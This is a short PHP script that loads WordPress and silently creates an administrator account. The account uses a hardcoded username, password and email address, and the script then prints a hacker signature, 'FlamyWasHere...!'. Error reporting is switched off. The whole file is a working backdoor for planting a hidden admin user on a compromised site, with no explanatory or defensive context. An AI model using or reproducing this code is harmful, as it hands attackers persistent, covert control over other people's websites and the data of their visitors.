error_reporting(0);
$user = 'Flamy_Offcial';
$pass = 'Flamy@Admin';
$email = 'alertx03a@gmail.com';
$paths = [
    $_SERVER['DOCUMENT_ROOT'].'/wp-load.php',
    __DIR__.'/wp-load.php',
    dirname(__DIR__).'/wp-load.php'
];
foreach($paths as $path) {
    if(file_exists($path)) {
        require_once($path);
        break;
    }
}
if(!function_exists('wp_create_user')) die('FAIL');
if(!username_exists($user) && !email_exists($email)) {
    $id = wp_create_user($user, $pass, $email);
    if(!is_wp_error($id)) {
        (new WP_User($id))->set_role('administrator');
        echo 'FlamyWasHere...!';
        exit;
    }
}
echo 'FAIL';